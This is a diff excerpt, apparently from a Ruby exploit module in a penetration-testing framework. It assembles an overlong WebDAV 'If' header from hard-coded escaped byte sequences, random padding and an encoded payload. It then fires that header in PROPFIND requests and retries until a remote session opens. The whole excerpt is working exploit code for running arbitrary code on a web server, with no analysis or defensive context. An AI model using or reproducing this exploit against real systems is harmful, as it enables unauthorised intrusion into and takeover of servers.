+        buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
+        buf1 << ">"
+        buf1 << " (Not <locktoken:write1>) <#{http_host}/"
+        buf1 << rand_text_alpha(114 - path_len)
+        buf1 << "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81"
+        buf1 << payload.encoded
+        buf1 << ">"
+
+        vprint_status("Sending payload")
+        res = send_request_raw(
+          'method' => 'PROPFIND',
+          'headers' => {
+            'Content-Length' => 0,
+            'If' => "#{buf1}"
+          },
+          'uri' => target_uri.path
+        )
+        if res
+          vprint_status("Server returned status #{res.code}")
+          if res.code == 502 || res.code == 400
+            next
+          elsif session_created?
+            return
+          else
+            vprint_status("Unknown Response: #{res.code}")
+          end
+        end
+      rescue ::Errno::ECONNRESET
+        vprint_status("got a connection reset")
+        next
+      end
+    end
+  end
+end